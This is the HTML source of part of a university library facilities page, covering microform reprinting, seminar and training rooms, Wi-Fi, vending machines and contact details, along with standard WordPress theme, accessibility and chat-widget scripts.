</span><span style="font-weight: 400;">library building located at Journal Collection, Level 3.</span></p> </div> </div> <div class="elementor-element elementor-element-0f34850 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="0f34850" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-3c1b053 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3c1b053" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-2d52964" data-id="2d52964" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9f8aeb1 elementor-widget elementor-widget-image" data-id="9f8aeb1" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-1024x683.jpg" class="attachment-large size-large wp-image-903" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0790-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-a817403" data-id="a817403" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-be5ebf1 elementor-widget elementor-widget-heading" data-id="be5ebf1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Microform Reprint</h2> </div> </div> <div class="elementor-element elementor-element-a341836 elementor-widget elementor-widget-text-editor" data-id="a341836" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">This service is available at Multimedia Unit, Level 2. Library clients can </span><span style="font-weight: 400;">prepare </span><span style="font-weight: 400;">printed copies and scan the information from microfilm or microfiche. Scanned information can be printed or downloaded into clients’ </span><span style="font-weight: 400;">pen drives</span><span style="font-weight: 400;">. Downloading is free of charge but printing costs RM0.50. Thesis and scholarly research cannot be photocopied or downloaded.</span></p> </div> </div> <div class="elementor-element elementor-element-d33d0d9 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="d33d0d9" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-3e0e757 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3e0e757" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ac9b3dc" data-id="ac9b3dc" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3cd7215 elementor-widget elementor-widget-heading" data-id="3cd7215" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Multipurpose / Seminar Room</h2> </div> </div> <div class="elementor-element elementor-element-0480b32 elementor-widget elementor-widget-text-editor" data-id="0480b32" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">There are three (3) seminar rooms that can accommodate 20, 30 and 50 clients at one time, and one (1) multipurpose room that can accommodate up to 150 clients. These facilities are provided for the library clients and are suitable for video presentations and lecture sessions. Library clients who want to use these facilities can make a reservation at </span><span style="font-weight: 400;">the </span><span style="font-weight: 400;">counter of Multimedia Unit, Level 2.</span></p> </div> </div> <div class="elementor-element elementor-element-517208d elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="517208d" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-0460f4a" data-id="0460f4a" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-dc17d51 elementor-widget elementor-widget-heading" data-id="dc17d51" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><span style="font-size: 22.4px">Zainal Azman Rajudin Training Room</span></h2> </div> </div> <div class="elementor-element elementor-element-c957be2 elementor-widget elementor-widget-text-editor" data-id="c957be2" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">This facility is excellent for training purposes and official events. This room is located at the Multimedia Unit, Level 2 and can accommodate 40 people at one time.</span></p> </div> </div> <div class="elementor-element elementor-element-59c58e9 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="59c58e9" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-1b63c13 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1b63c13" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-751af56" data-id="751af56" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c127d95 elementor-widget elementor-widget-heading" data-id="c127d95" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Wi-fi Coverage</h2> </div> </div> <div class="elementor-element elementor-element-149fe94 elementor-widget elementor-widget-text-editor" data-id="149fe94" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">All levels in the library are equipped with Wi-Fi coverage.</span></p> </div> </div> <div class="elementor-element elementor-element-4099d32 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="4099d32" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-068ea2a" data-id="068ea2a" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1d3d9cb elementor-widget elementor-widget-heading" data-id="1d3d9cb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Vending machine</h2> </div> </div> <div class="elementor-element elementor-element-f34a4fd elementor-widget elementor-widget-text-editor" data-id="f34a4fd" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span id="docs-internal-guid-fcd248ba-7fff-ae25-ca74-50734d09cb13" style="font-weight: normal;"><span style="font-size: 10.5pt; font-family: Arial; color: #0e101a; font-weight: 400; font-style: normal; font-variant: normal; white-space: pre-wrap;">The library provides vending machine</span><span style="font-size: 10.5pt; font-family: Arial; color: #0e101a; background-color: #ffff00; font-weight: 400; font-style: normal; font-variant: normal; white-space: pre-wrap;">s</span><span style="font-size: 10.5pt; font-family: Arial; color: #0e101a; font-weight: 400; font-style: normal; font-variant: normal; white-space: pre-wrap;"> at 24 hours reading area for refreshments.</span></span></p> </div> </div> <div class="elementor-element elementor-element-2075479 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="2075479" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-5e21679 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5e21679" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-02f5d8b" data-id="02f5d8b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-52da581 elementor-widget elementor-widget-heading" data-id="52da581" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Contact Us</h2> </div> </div> <div class="elementor-element elementor-element-a59a5fe elementor-widget elementor-widget-text-editor" data-id="a59a5fe" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Tun Seri Lanang Library, <br />Universiti Kebangsaan Malaysia<br />43600 Bangi, Selangor Darul Ehsan,Malaysia<br />603-89213446 / 019-2045652 (Telegram/Whatsapp) <br />603-89256067 (FAKS) <br /><br /></p> </div> </div> <div class="elementor-element elementor-element-fb3c161 elementor-shape-rounded elementor-grid-0 e-grid-align-center elementor-widget elementor-widget-social-icons" data-id="fb3c161" data-element_type="widget" data-widget_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper elementor-grid"> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-f1e2030" href="https://www.facebook.com/ptslukm/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fab fa-facebook"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-7684840" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fab fa-twitter"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-5f7b65b" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fab fa-youtube"></i> </a> </span> </div> </div> </div> <div class="elementor-element elementor-element-2d995ee elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="2d995ee" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-3f8e775" data-id="3f8e775" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c9950cd elementor-widget elementor-widget-image" data-id="c9950cd" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-1024x683.jpg" class="attachment-large size-large wp-image-270" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-dfd45ef" data-id="dfd45ef" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1ac6d82 elementor-widget elementor-widget-image" data-id="1ac6d82" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg" class="attachment-large size-large wp-image-900" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-9c9c76b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="9c9c76b" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c710046" data-id="c710046" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-356980d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="356980d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-aa4fa6b" data-id="aa4fa6b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-f93c6cc elementor-align-right envato-kit-80-cta elementor-widget elementor-widget-button" data-id="f93c6cc" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a class="elementor-button elementor-button-link elementor-size-sm" href="#"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Perpustakaan Pemangkin Masyarakat Berilmu</span> </span> </a> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-08d30eb" data-id="08d30eb" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-ae3e70b elementor-view-default elementor-widget elementor-widget-icon" data-id="ae3e70b" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <a class="elementor-icon" href="#"> <i class="fa fa-forward" aria-hidden="true"></i> </a> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> </div> </main><!-- #main --> <footer id="footer" class="site-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter" role="contentinfo"> <div id="footer-inner" class="clr"> <div id="footer-widgets" class="oceanwp-row clr"> <div class="footer-widgets-inner container"> <div class="footer-box span_1_of_4 col col-1"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-2"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-3 "> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-4"> </div><!-- .footer-box --> </div><!-- .container --> </div><!-- #footer-widgets --> <div id="footer-bottom" class="clr no-footer-nav"> <div id="footer-bottom-inner" class="container clr"> <div id="copyright" class="clr" role="contentinfo"> Copyright © The National University of Malaysia Library </div><!-- #copyright --> </div><!-- #footer-bottom-inner --> </div><!-- #footer-bottom --> </div><!-- #footer-inner --> </footer><!-- #footer --> </div><!-- #wrap --> </div><!-- #outer-wrap --> <a aria-label="Scroll to the top of the page" href="#" id="scroll-top" class="scroll-top-right"><i class=" fa fa-angle-up" aria-hidden="true" role="img"></i></a> <!--Start of Tawk.to Script (0.8.6)--> <script id="tawk-script" type="text/javascript"> var Tawk_API = Tawk_API || {}; var Tawk_LoadStart=new Date(); (function(){ var s1 = document.createElement( 'script' ),s0=document.getElementsByTagName( 'script' )[0]; s1.async = true; s1.src = 'https://embed.tawk.to/5fd081bfa1d54c18d8f1d89f/default'; s1.charset = 'UTF-8'; s1.setAttribute( 'crossorigin','*' ); s0.parentNode.insertBefore( s1, s0 ); })(); </script> <!--End of Tawk.to Script (0.8.6)--> <div id="wp_access_helper_container" class="accessability_container dark_theme"> <!-- WP Accessibility Helper (WAH) - https://wordpress.org/plugins/wp-accessibility-helper/ --> <!-- Official plugin website - https://accessibility-helper.co.il --> <button type="button" class="wahout aicon_link" accesskey="z" aria-label="Accessibility Helper sidebar" title="Accessibility Helper sidebar"> <img src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/images/accessibility-48.jpg" alt="Accessibility" class="aicon_image" /> </button> <div id="access_container" aria-hidden="true"> <button tabindex="-1" type="button" class="close_container wahout" accesskey="x" aria-label="Close" title="Close"> Close </button> <div class="access_container_inner"> <div class="a_module wah_font_resize"> <div class="a_module_title">Font size</div> <div class="a_module_exe font_resizer"> <button tabindex="-1" type="button" class="wah-action-button smaller wahout" title="smaller font size" aria-label="smaller font size">A-</button> <button tabindex="-1" type="button" class="wah-action-button larger wahout" title="larger font size" aria-label="larger font size">A+</button><button tabindex="-1" type="button" class="wah-action-button wah-font-reset wahout" title="Reset font size" aria-label="Reset font size">Reset</button> </div> </div><div class="a_module wah_keyboard_navigation"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-keyboard-navigation" aria-label="Keyboard navigation" title="Keyboard navigation">Keyboard navigation</button> </div> </div><div class="a_module wah_readable_fonts"> <div class="a_module_exe readable_fonts"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-readable-fonts" aria-label="Readable Font" title="Readable Font">Readable Font</button> </div> </div><div class="a_module wah_contrast_trigger"> <div class="a_module_title">Colors</div> <div class="a_module_exe"> <button tabindex="-1" type="button" id="contrast_trigger" class="contrast_trigger wah-action-button wahout wah-call-contrast-trigger" title="Contrast">Choose color</button> <div class="color_selector" aria-hidden="true"> <button type="button" class="convar black wahout" data-bgcolor="#000" data-color="#FFF" title="black">black</button> <button type="button" class="convar white wahout" data-bgcolor="#FFF" data-color="#000" title="white">white</button> <button type="button" class="convar green wahout" data-bgcolor="#00FF21" data-color="#000" title="green">green</button> <button type="button" class="convar blue wahout" data-bgcolor="#0FF" data-color="#000" title="blue">blue</button> <button type="button" class="convar red wahout" data-bgcolor="#F00" data-color="#000" title="red">red</button> <button type="button" class="convar orange wahout" data-bgcolor="#FF6A00" data-color="#000" title="orange">orange</button> <button type="button" class="convar yellow wahout" data-bgcolor="#FFD800" data-color="#000" title="yellow">yellow</button> <button type="button" class="convar navi wahout" data-bgcolor="#B200FF" data-color="#000" title="navi">navi</button> </div> </div> </div><div class="a_module wah_underline_links"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-underline-links" aria-label="Underline links" title="Underline links">Underline links</button> </div> </div><div class="a_module wah_highlight_links"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-highlight-links" aria-label="Highlight Links" title="Highlight Links">Highlight Links</button> </div> </div><div class="a_module wah_clear_cookies"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-clear-cookies" aria-label="Clear cookies" title="Clear cookies">Clear cookies</button> </div> </div><div class="a_module wah_greyscale"> <div class="a_module_exe"> <button tabindex="-1" type="button" id="greyscale" class="greyscale wah-action-button wahout wah-call-greyscale" aria-label="Images Greyscale" title="Images Greyscale">Images Greyscale</button> </div> </div><div class="a_module wah_invert"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-invert" aria-label="Invert Colors" title="Invert Colors">Invert Colors</button> </div> </div><div class="a_module wah_remove_animations"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-remove-animations" aria-label="Remove Animations" title="Remove Animations">Remove Animations</button> </div> </div> <button type="button" title="Close sidebar" class="wah-skip close-wah-sidebar"> Close </button> </div> </div> <script type="text/javascript"> var roleLink = 1; var removeLinkTitles = 1; </script> <style> @media only screen and (max-width: 480px) {div#wp_access_helper_container {display: none;}} </style> <div class="wah-free-credits"> <div class="wah-free-credits-inner"> <a href="https://accessibility-helper.co.il/" target="_blank" title="Accessibility by WP Accessibility Helper Team">Accessibility by WAH</a> </div> </div> <!-- WP Accessibility Helper. Created by Alex Volkov. --> </div> <script type='text/javascript'> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/js/wp-accessibility-helper.min.js?ver=1.0.0" id="wp-accessibility-helper-js"></script> <script id="wpvr-js-extra"> var wpvr_public = {"notice_active":"","notice":""}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/wpvr-public.js?ver=8.5.8" id="wpvr-js"></script> <script id="eac-frontend-js-before"> var eacElementsPath = {"proxies":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/proxy\/","pdfJs":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/js\/pdfjs\/","osmImages":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/images\/","osmConfig":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/config\/osm\/"} </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/eac-frontend.min.js?ver=2.2.8" id="eac-frontend-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/fancybox/jquery.fancybox.min.js?ver=3.5.7" id="eac-fancybox-js" defer data-wp-strategy="defer"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script> <script id="oceanwp-main-js-extra"> var oceanwpLocalize = {"nonce":"08bfa6c265","isRTL":"","menuSearchStyle":"drop_down","mobileMenuSearchStyle":"disabled","sidrSource":null,"sidrDisplace":"1","sidrSide":"left","sidrDropdownTarget":"link","verticalHeaderTarget":"link","customScrollOffset":"0","customSelects":".woocommerce-ordering .orderby, #dropdown_product_cat, .widget_categories select, .widget_archive select, .single-product .variations_form .variations select"}; </script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/theme.min.js?ver=4.0.2" id="oceanwp-main-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-mobile-menu.min.js?ver=4.0.2" id="oceanwp-drop-down-mobile-menu-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-search.min.js?ver=4.0.2" id="oceanwp-drop-down-search-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/magnific-popup.min.js?ver=4.0.2" id="ow-magnific-popup-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-lightbox.min.js?ver=4.0.2" id="oceanwp-lightbox-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/flickity.pkgd.min.js?ver=4.0.2" id="ow-flickity-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-slider.min.js?ver=4.0.2" id="oceanwp-slider-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-effect.min.js?ver=4.0.2" id="oceanwp-scroll-effect-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-top.min.js?ver=4.0.2" id="oceanwp-scroll-top-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/select.min.js?ver=4.0.2" id="oceanwp-select-js"></script> <script id="eael-general-js-extra"> var localize = {"ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","nonce":"cbe8981d42","i18n":{"added":"Added ","compare":"Compare","loading":"Loading..."},"eael_translate_text":{"required_text":"is a required field","invalid_text":"Invalid","billing_text":"Billing","shipping_text":"Shipping","fg_mfp_counter_text":"of"},"page_permalink":"https:\/\/www.ukm.my\/ptsl\/?page_id=256","cart_redirectition":"","cart_page_url":"","el_breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.0.10" id="eael-general-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.25.9" id="elementor-webpack-runtime-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.25.9" id="elementor-frontend-modules-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3" id="jquery-ui-core-js"></script> <script id="elementor-frontend-js-before"> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.25.9","is_static":false,"experimentalFeatures":{"additional_custom_breakpoints":true,"container":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_optimized_control_loading":true,"e_onboarding":true,"e_css_smooth_scroll":true,"home_screen":true,"landing-pages":true,"nested-elements":true,"editor_v2":true,"link-in-bio":true,"floating-buttons":true},"urls":{"assets":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/www.ukm.my\/ptsl\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"bbea2f8679"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":256,"title":"facilities-bi%20%E2%80%93%20ptsl","excerpt":"","featuredImage":false}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.25.9" id="elementor-frontend-js"></script> </body> </html>